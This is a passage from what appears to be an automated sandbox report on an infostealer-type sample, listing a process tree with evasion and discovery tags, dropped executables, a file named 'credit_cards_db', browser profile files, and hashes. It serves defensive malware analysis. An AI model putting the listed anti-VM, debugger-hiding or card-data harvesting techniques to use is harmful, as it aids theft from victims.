                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4980
                                                    • C:\Users\Admin\AppData\Local\Temp\1011951001\rhnew.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1011951001\rhnew.exe"
                                                      5⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      PID:408
                                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                              1⤵
                                                PID:1376
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                1⤵
                                                  PID:4480
                                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  1⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3820
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 3540 -ip 3540
                                                  1⤵
                                                    PID:2308
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2824 -ip 2824
                                                    1⤵
                                                      PID:5740
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2824 -ip 2824
                                                      1⤵
                                                        PID:5752
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2824 -ip 2824
                                                        1⤵
                                                          PID:5764

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\ProgramData\mozglue.dll

                                                          Filesize

                                                          593KB

                                                          MD5

                                                          c8fd9be83bc728cc04beffafc2907fe9

                                                          SHA1

                                                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                          SHA256

                                                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                          SHA512

                                                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                        • C:\ProgramData\nss3.dll

                                                          Filesize

                                                          2.0MB

                                                          MD5

                                                          1cc453cdf74f31e4d913ff9c10acdde2

                                                          SHA1

                                                          6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                          SHA256

                                                          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                          SHA512

                                                          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                          Filesize

                                                          649B

                                                          MD5

                                                          f7274d853dd03c643d39cf8104c5030e

                                                          SHA1

                                                          c33a7e4a53969a7ca2725c0586c80c1fdd70f9fe

                                                          SHA256

                                                          3419a0cf1f4befeb0a15b74fda63d7c37a132c1cd527026773a93b8da88a5a1d

                                                          SHA512

                                                          0e9f44554f78bf8d56f7a90d8623c21974bb2eec56d3908ef32bed44c7bad69247cd33de48b2cfbac3dd46d236ca7edbf9c7ce3428073c59b0c207af02b6a147

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json

                                                          Filesize

                                                          851B

                                                          MD5

                                                          07ffbe5f24ca348723ff8c6c488abfb8

                                                          SHA1

                                                          6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                                          SHA256

                                                          6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                                          SHA512

                                                          7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json

                                                          Filesize

                                                          854B

                                                          MD5

                                                          4ec1df2da46182103d2ffc3b92d20ca5

                                                          SHA1

                                                          fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                          SHA256

                                                          6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                          SHA512

                                                          939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                          Filesize

                                                          2B

                                                          MD5

                                                          d751713988987e9331980363e24189ce

                                                          SHA1

                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                          SHA256

                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                          SHA512

                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                          Filesize

                                                          152B

                                                          MD5

                                                          c2d9eeb3fdd75834f0ac3f9767de8d6f

                                                          SHA1

                                                          4d16a7e82190f8490a00008bd53d85fb92e379b0

                                                          SHA256

                                                          1e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66

                                                          SHA512

                                                          d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                          Filesize

                                                          152B

                                                          MD5

                                                          e55832d7cd7e868a2c087c4c73678018

                                                          SHA1

                                                          ed7a2f6d6437e907218ffba9128802eaf414a0eb

                                                          SHA256

                                                          a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574

                                                          SHA512

                                                          897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3d6890fb-a1c7-41e3-b739-877f8735c2e6.tmp

                                                          Filesize

                                                          1B

                                                          MD5

                                                          5058f1af8388633f609cadb75a75dc9d

                                                          SHA1

                                                          3a52ce780950d4d969792a2559cd519d7ee8c727

                                                          SHA256

                                                          cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                          SHA512

                                                          0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\94b150ca-959a-4fbe-a721-f1fb1c437fe7.tmp

                                                          Filesize

                                                          5KB

                                                          MD5

                                                          86d98c315dca7096e51f1f709c1c3b32

                                                          SHA1

                                                          8d47dffb5a4e4efb5a0ba026d3aff944b5c55d12

                                                          SHA256

                                                          24092cfda0f9cc0daa232c404cb5a17b1eddefa9d6101dd382077c55edd9eda5

                                                          SHA512

                                                          a4299b76dc99e4b9ff9f2314ebff7d39b50ac3c8d3d3d9acd1ac23bb78b9828097e8bb256f13000c5b651b7c419444ba6fef2d3f29ab2bc29c77cf601fd4e949

                                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\activity-stream.discovery_stream.json

                                                          Filesize

                                                          22KB

                                                          MD5

                                                          a028e7f7355a7e7e04ecd57b34ca10b0

                                                          SHA1

                                                          7b534b6940a8b0a5300ce67c2a691d4e94b31b44

                                                          SHA256

                                                          a6c781e404153faab771f21cf9cb748f41a3f6a984f7916403772c053ae155f6

                                                          SHA512

                                                          3f8dc40d33cdcf173bd2f29842d646020f1d9133d0fa8e62d2cb9bbb8a4cd13b41642a1f86627995991cbde4e9e19f72d6661c23b41fb658e9964bda30a038d3

                                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                          Filesize

                                                          15KB

                                                          MD5

                                                          96c542dec016d9ec1ecc4dddfcbaac66

                                                          SHA1

                                                          6199f7648bb744efa58acf7b96fee85d938389e4

                                                          SHA256

                                                          7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                                          SHA512

                                                          cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                                                        • C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe

                                                          Filesize

                                                          5.0MB

                                                          MD5

                                                          71c8588c96e879748f4c320c9b4aeec2

                                                          SHA1

                                                          9a5baa7e9b1c6b8b5d3ff674dcae22ae017d8447

                                                          SHA256

                                                          a4bb60772446f2cd2f7629574bbf5702c35ce2afcf6e4b3a3d157281cecc7234

                                                          SHA512

                                                          8ab113c203eab23f4969b45ec4cc3c383e402f5a32dea035032e340bf8b9aacf5c734c259419ebb146cf2426b1f944032ce944cb2d9714255907989f260c5a0e

                                                        • C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe

                                                          Filesize

                                                          5.6MB

                                                          MD5

                                                          20c1c110a69ba6dc9fb55a1186334290

                                                          SHA1

                                                          7b35f156d8ef02936af990349d35efd7146380f2

                                                          SHA256

                                                          7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29

                                                          SHA512

                                                          08eb3ff63e09c6d236ceac3c006c844c48f283c266e8b3fa25ec1ee04d2eca49ec4788534e1ee55749de5ad89ddfa0dbbafa4eb9f30f35cdd783da08a2ad5d10

                                                        • C:\Users\Admin\AppData\Local\Temp\1011945001\7d827da348.exe

                                                          Filesize

                                                          1.9MB

                                                          MD5

                                                          b00fddad7146360a79dc9f44a551a845

                                                          SHA1

                                                          137a9e351a0216710004634997c78be7a7c85217

                                                          SHA256

                                                          cead013e2c3a7335e5945972ecd71d9d0b9a2deec418a3fa693763320c22b212

                                                          SHA512

                                                          2e43566eeda5d000c3d6855d096a3f6033b3cbc583c7c83bd6afd3b3c767474a295e810b718a6cb97b2144ab75f2223c1ddd988ca8f2f893982e8d8621c7f85c

                                                        • C:\Users\Admin\AppData\Local\Temp\1011946001\4caa2bc894.exe

                                                          Filesize

                                                          4.3MB

                                                          MD5

                                                          be76a09e036f57326d7fd559412016b9

                                                          SHA1

                                                          aa71c0a9e30080d9b5660427a3177399743dff94

                                                          SHA256

                                                          b0194d131df2a6546ec420e3415e30650886515f1fbb73ba3f99029c1f3e31a3

                                                          SHA512

                                                          8a003c02b74b77b505cac7f07076bbc9ed47a298697a73ff14d70048e712eee57d5f3ed53bbc178f82f2a3a4a6c39cc23da93e2da5ff89e2fcb960cd23b554cb

                                                        • C:\Users\Admin\AppData\Local\Temp\1011947001\befb3070da.exe

                                                          Filesize

                                                          1.8MB

                                                          MD5

                                                          2effdee9fcf18bb6a2c2758b1f83b272

                                                          SHA1

                                                          40dd4f13f2c31e534eb985f9a1e9bb42548d4d8d

                                                          SHA256

                                                          8f5a1b8b54507e96a638b8263831a1839e1f690f62b8b3d3826ea5297251e388

                                                          SHA512

                                                          fe3eb5a5c471bc3cec41ca647f0596db48741148cac46d1c808e64a5db95224ff8abdbd6529fb12c588e3a6d67443fefb8d3dd8c9f587728c474a319b99fe430

                                                        • C:\Users\Admin\AppData\Local\Temp\1011948001\8373d2c99b.exe

                                                          Filesize

                                                          1.7MB

                                                          MD5

                                                          1b850dd61dfbb0fb8782987f0b6f365c

                                                          SHA1

                                                          a6d5c487ba7c8417ac4f2f6ab46a560f20ca404d

                                                          SHA256

                                                          a5e020f3d85998f530607c7e83d229449befec6e9800c5ae6f9cdd76659da0ef

                                                          SHA512

                                                          38da11e6e7e1c09d892cf79ee0c51a560f6caf7dc748c04200c5fb8dea3fad2b8f5d33041863bf4b9ee6e54b9dfaf57f823fd1c63c0147955952650b6e013c96

                                                        • C:\Users\Admin\AppData\Local\Temp\1011949001\255e8fdf1c.exe

                                                          Filesize

                                                          945KB

                                                          MD5

                                                          a0cbbfb318f3234ba27fe37209f912ec

                                                          SHA1

                                                          f8ffd3d9f9f1ffe53ebc5f304e9690b3f75a7408

                                                          SHA256

                                                          53b494f24583c4909633d9084b7a8875b854600a635847842285ecbcd1067dfc

                                                          SHA512

                                                          e8237171ac54c47a82d83da487c69beb824017b23c61b2277f83784925fa3b74d9e23d6b2c626d4e61fc43fb3ae27502498a031994319076ef89d4155f5d8041

                                                        • C:\Users\Admin\AppData\Local\Temp\1011950001\38a103eec7.exe

                                                          Filesize

                                                          2.6MB

                                                          MD5

                                                          c70af23073a65ecade1c60277c87926c

                                                          SHA1

                                                          f767ac215f7976cbc5f3a29efc5cb1445ff348d7

                                                          SHA256

                                                          4f90cb22170be6c5460ab828e47b0cf2b323b1920acf1e479c49cf0ffa451363

                                                          SHA512

                                                          0528c4996c2a3ac5dcfca9f4e9e7961341793683c65eb79711895376bb4165ac773136c982c3a95fa30d71ef468c796d8a51caf2d20fad050fb22dbbed7af13d

                                                        • C:\Users\Admin\AppData\Local\Temp\1011951001\rhnew.exe

                                                          Filesize

                                                          1.8MB

                                                          MD5

                                                          a84456172908e096d0ac6272b9503e08

                                                          SHA1

                                                          8b64d38bae9fc390e621323e9e91eb8f7def421c

                                                          SHA256

                                                          4f95dff270ac4172d470789c3fce9ae2c656565a3887afc86507ec49981bd128

                                                          SHA512

                                                          3237f19915957327d3debd46de1c52531622fba5dbb2e06c9685ca336bd4febf19c2f3dd533c5046b0e676d21f10ba10478b3bbe9dbb31823b7dc118a6413800

                                                        • C:\Users\Admin\AppData\Local\Temp\99937c17-da1e-4c26-8c6e-ff6f0558e312.tmp

                                                          Filesize

                                                          135KB

                                                          MD5

                                                          3f6f93c3dccd4a91c4eb25c7f6feb1c1

                                                          SHA1

                                                          9b73f46adfa1f4464929b408407e73d4535c6827

                                                          SHA256

                                                          19f05352cb4c6e231c1c000b6c8b7e9edcc1e8082caf46fff16b239d32aa7c9e

                                                          SHA512

                                                          d488fa67e3a29d0147e9eaf2eabc74d9a255f8470cf79a4aea60e3b3b5e48a3fcbc4fc3e9ce58dff8d7d0caa8ae749295f221e1fe1ba5d20deb2d97544a12ba4

                                                        • C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

                                                          Filesize

                                                          1.7MB

                                                          MD5

                                                          65ccd6ecb99899083d43f7c24eb8f869

                                                          SHA1

                                                          27037a9470cc5ed177c0b6688495f3a51996a023

                                                          SHA256

                                                          aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

                                                          SHA512

                                                          533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

                                                        • C:\Users\Admin\AppData\Local\Temp\scoped_dir4136_1721141405\CRX_INSTALL\_locales\en_CA\messages.json

                                                          Filesize

                                                          711B

                                                          MD5

                                                          558659936250e03cc14b60ebf648aa09

                                                          SHA1

                                                          32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

                                                          SHA256

                                                          2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

                                                          SHA512

                                                          1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

                                                        • C:\Users\Admin\AppData\Local\Temp\tmp843A.tmp.bat

                                                          Filesize

                                                          186B

                                                          MD5

                                                          3e1193783a94f22715b17fb78dc88b12

                                                          SHA1

                                                          18397af3fbc7cfb55c1b1f2e6f2608ef412c6863

                                                          SHA256

                                                          bc7eda9c71d59e72fe8d719febfe85a17ae8273f1016b5f9f8e4499a5bfdd428

                                                          SHA512

                                                          c045707f148e7aeb342820cbb439ad9d0ab6e085aaea5f4dec54f22f6ddf655aa872855e6cb49180344d46d079ce24260db5b097baec2014f251da5a34e8aad0

                                                        • C:\Users\Admin\AppData\Roaming\AdminUserCash\credit_cards_db

                                                          Filesize

                                                          114KB

                                                          MD5

                                                          eb8c6139f83c330881b13ec4460d5a39

                                                          SHA1

                                                          837283823a7e4e107ca7e39b1e7c3801841b1ef8

                                                          SHA256

                                                          489d5195735786050c4115677c5856e3ce72c3ecf2574be55021ad3d71caf40e

                                                          SHA512

                                                          88411dca362f0d9da0c093e60bf2b083340d0682b5ac91f25c78ac419cec1e325d0a5a0f96fd447d3d3806813cad7f1ca8cf9c423061327fbd16c8662f3cbddf

                                                        • C:\Users\Admin\AppData\Roaming\AdminUserCash\credit_cards_db

                                                          Filesize

                                                          116KB

                                                          MD5

                                                          f70aa3fa04f0536280f872ad17973c3d

                                                          SHA1

                                                          50a7b889329a92de1b272d0ecf5fce87395d3123

                                                          SHA256

                                                          8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                                          SHA512

                                                          30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin

                                                          Filesize

                                                          11KB

                                                          MD5

                                                          9a010a70fd89bf860debd6d7ee87d337

                                                          SHA1

                                                          a7c7a1054d41356aa5c76a4c9774ea428b29a0cc

                                                          SHA256

                                                          a2510dcdbad7adcd9a624d3c63f554faf2d165a76e37bb94a539b7befb5edbf0

                                                          SHA512

                                                          03aa8b847a0b4c2b3e40903665c7c959f2965b43dc8ded3b251f9e96cbac4c419e26fe8c70e4ff9fdade0431e481f096ecc2a1a2e7fe16e6f656b16733b13b84

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                                                          Filesize

                                                          5KB

                                                          MD5

                                                          fec4c904275675b807ac8edb8b6f5556

                                                          SHA1

                                                          853d2fe9810f8279e645ab21624825f580d1d0c3

                                                          SHA256

                                                          5a0c38520b779d7be86df2fb74fb552a0e967717cdf2bcfca372b002bb96774b

                                                          SHA512

                                                          80fdc5e31d4225a97e18acb2fb3b59e88c0f79a4c4bf9e55ef25358b89cf174f9863586878e2d1e34369e57710ff4952571ea3c3d747246b9d886c2c51b44051

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

                                                          Filesize

                                                          6KB

                                                          MD5

                                                          d024d2ccc92bedc46fafd16ab5a5efa2

                                                          SHA1

                                                          cfc58d3ca9d68720828c7557e3d45ff589657d90

                                                          SHA256

                                                          edc4669b8daa86b9d8b815f2c7077cf0648449e87194b8b008e861ec581e1472

                                                          SHA512

                                                          f768a2ad26d0528233ff851ea6dbf7cbe2d35d1eb2321d9b27045d71236de6de6079fb893a87d55411186e20775539e5dcc1a43b132a8034afab5dd10d135a72

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\06652ee5-6b22-443c-89e6-072106b6b4ac

                                                          Filesize

                                                          982B

                                                          MD5

                                                          e4bfda3e6cfea529e84fdbe74014a119

                                                          SHA1

                                                          8907e9c1ac30c23cd8de28f3e1ff65fbb4554d10

                                                          SHA256

                                                          883987cda36fe2956feeb926812af5cdd53d2d0dc6ff665590c52db00f04c6a7

                                                          SHA512

                                                          ae5aefce8839665de496b52a3717a345697bd02a0207f0954f1d3e1a347d953c133b766691e4fc0181a7901357ccc71c8458ed799429297982c0311d582fbf36

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\db026115-01ac-45fd-9465-cbaba5893dfa

                                                          Filesize

                                                          28KB

                                                          MD5

                                                          044f6be7d172ecc53544ff2c632a95f6

                                                          SHA1

                                                          0a6b393092cdaf159514e1d052ccb538d54a167d

                                                          SHA256

                                                          419fe14126afb4c3d50fa06f4a9f56f05c122d0e7a3f6befdb33ab93551068a3

                                                          SHA512

                                                          8a6dd54a331b2c35165cfb47a1e8948473724ebe59989207a2cb3dae1a94f55536687854f39a7adefae8b7b1aa9221fc8b39011be4a8baf515c4d3cbe1b750ee

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\dd1366f2-3f33-4666-8f6f-adfbe1835853

                                                          Filesize

                                                          671B

                                                          MD5

                                                          73c9d756e7188532eead1c5ea83430b9

                                                          SHA1

                                                          1917b016c7a1064c7d9656f6fbe26247e67eafa2

                                                          SHA256

                                                          46f6e2f03ee3dd4b772cba3b2cd8de65b7f29d4ed3486d832066e29468bf9eb3

                                                          SHA512

                                                          151464827ad6129f892e5afd88dc1f9a0c220d38e7ef7ecf495541aebd5ff965068e2ec5490ca0132c29084005c8f1800415cafee35a355671f613416fd41a53

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs.js

                                                          Filesize

                                                          10KB

                                                          MD5

                                                          2a334eb34de3a3cbdb0f2c97f6550b76

                                                          SHA1

                                                          7971501679bd1bc37c44923075898e93ba8adba4

                                                          SHA256

                                                          ac52b9fac67216b9897f6439cc8954c080b5d7c10e098e9201597193c2ca9356

                                                          SHA512

                                                          0b718279629c6f01c297c5b24d42a5ca9491eba223109c4a755ac1598e971893040aa78315563270b8ce5b1c20c11c215eb5103de262799031e526fef00baf16

                                                        • C:\Users\Admin\Documents\IEHJDGIDBA.exe

                                                          Filesize

                                                          3.1MB

                                                          MD5

                                                          d4e576f2c6e03c5d117371252ce42a51

                                                          SHA1

                                                          5e7da31fb84515315064592102aabc605e735912

                                                          SHA256

                                                          b4ec4fa9a82bcf05881623ad9375ecb5148aa9cd3309edd6fa14a4ca75580b6d

                                                          SHA512

                                                          8e8302591b52e33b574178ec8a210a66b96c825e3e070460a624ff007d8c9f0770fbac4ba3c12de4a5c83f80fa56970aed5f3dca78a9e169c688edb3610c0e19

                                                        • memory/408-1150-0x0000000000470000-0x000000000090F000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/408-1187-0x0000000000470000-0x000000000090F000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/408-1186-0x0000000000470000-0x000000000090F000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/412-609-0x0000021E9A280000-0x0000021E9A2A6000-memory.dmp

                                                          Filesize

                                                          152KB

                                                        • memory/412-590-0x0000021EFEE60000-0x0000021EFF3F8000-memory.dmp

                                                          Filesize

                                                          5.6MB

                                                        • memory/412-652-0x0000021EFF7A0000-0x0000021EFF7B2000-memory.dmp

                                                          Filesize

                                                          72KB

                                                        • memory/412-596-0x0000021EFF4B0000-0x0000021EFF4BA000-memory.dmp

                                                          Filesize

                                                          40KB

                                                        • memory/412-610-0x0000021E9B1F0000-0x0000021E9B51E000-memory.dmp

                                                          Filesize

                                                          3.2MB

                                                        • memory/412-601-0x0000021EFF780000-0x0000021EFF79E000-memory.dmp

                                                          Filesize

                                                          120KB

                                                        • memory/412-602-0x0000021E9A3F0000-0x0000021E9A45A000-memory.dmp

                                                          Filesize

                                                          424KB

                                                        • memory/412-604-0x0000021E9A460000-0x0000021E9A512000-memory.dmp

                                                          Filesize

                                                          712KB

                                                        • memory/412-605-0x0000021EFF7F0000-0x0000021EFF840000-memory.dmp

                                                          Filesize

                                                          320KB

                                                        • memory/412-606-0x0000021EFF8D0000-0x0000021EFF8F2000-memory.dmp

                                                          Filesize

                                                          136KB

                                                        • memory/412-608-0x0000021E9A510000-0x0000021E9A54A000-memory.dmp

                                                          Filesize

                                                          232KB

                                                        • memory/412-598-0x0000021EFF850000-0x0000021EFF8C6000-memory.dmp

                                                          Filesize

                                                          472KB

                                                        • memory/1768-547-0x0000000000080000-0x0000000000391000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1768-712-0x0000000000080000-0x0000000000391000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1768-571-0x0000000000080000-0x0000000000391000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1768-629-0x0000000000080000-0x0000000000391000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1768-770-0x0000000000080000-0x0000000000391000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1768-1173-0x0000000000080000-0x0000000000391000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1768-548-0x0000000000080000-0x0000000000391000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1768-568-0x0000000000080000-0x0000000000391000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1768-567-0x0000000000080000-0x0000000000391000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/2824-771-0x0000000000740000-0x0000000000BEB000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/2824-752-0x0000000000740000-0x0000000000BEB000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/2824-1172-0x0000000000740000-0x0000000000BEB000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/2824-710-0x0000000000740000-0x0000000000BEB000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/3100-500-0x0000000000FC0000-0x0000000001652000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/3100-521-0x0000000000FC0000-0x0000000001652000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/3100-1-0x0000000077B74000-0x0000000077B76000-memory.dmp

                                                          Filesize

                                                          8KB

                                                        • memory/3100-2-0x0000000000FC1000-0x0000000000FD8000-memory.dmp

                                                          Filesize

                                                          92KB

                                                        • memory/3100-3-0x0000000000FC0000-0x0000000001652000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/3100-4-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                          Filesize

                                                          972KB

                                                        • memory/3100-298-0x0000000000FC0000-0x0000000001652000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/3100-441-0x0000000000FC0000-0x0000000001652000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/3100-444-0x0000000000FC0000-0x0000000001652000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/3100-489-0x0000000000FC0000-0x0000000001652000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/3100-534-0x0000000000FC0000-0x0000000001652000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/3100-496-0x0000000000FC0000-0x0000000001652000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/3100-0-0x0000000000FC0000-0x0000000001652000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/3100-501-0x0000000000FC0000-0x0000000001652000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/3184-687-0x0000000010000000-0x000000001001C000-memory.dmp

                                                          Filesize

                                                          112KB

                                                        • memory/3184-714-0x0000000000400000-0x0000000000C6E000-memory.dmp

                                                          Filesize

                                                          8.4MB

                                                        • memory/3184-803-0x0000000000400000-0x0000000000C6E000-memory.dmp

                                                          Filesize

                                                          8.4MB

                                                        • memory/3184-1179-0x0000000000400000-0x0000000000C6E000-memory.dmp

                                                          Filesize

                                                          8.4MB

                                                        • memory/3184-658-0x0000000000400000-0x0000000000C6E000-memory.dmp

                                                          Filesize

                                                          8.4MB

                                                        • memory/3184-713-0x0000000000400000-0x0000000000C6E000-memory.dmp

                                                          Filesize

                                                          8.4MB

                                                        • memory/3360-732-0x0000000000C80000-0x000000000194D000-memory.dmp

                                                          Filesize

                                                          12.8MB

                                                        • memory/3360-693-0x0000000000C80000-0x000000000194D000-memory.dmp

                                                          Filesize

                                                          12.8MB

                                                        • memory/3360-775-0x0000000000C80000-0x000000000194D000-memory.dmp

                                                          Filesize

                                                          12.8MB

                                                        • memory/3360-751-0x0000000000C80000-0x000000000194D000-memory.dmp

                                                          Filesize

                                                          12.8MB

                                                        • memory/3540-569-0x0000000002970000-0x00000000029C5000-memory.dmp

                                                          Filesize

                                                          340KB

                                                        • memory/3756-545-0x00000000004F0000-0x0000000000801000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/3756-533-0x00000000004F0000-0x0000000000801000-memory.dmp

                                                          Filesize

                                                          3.1MB

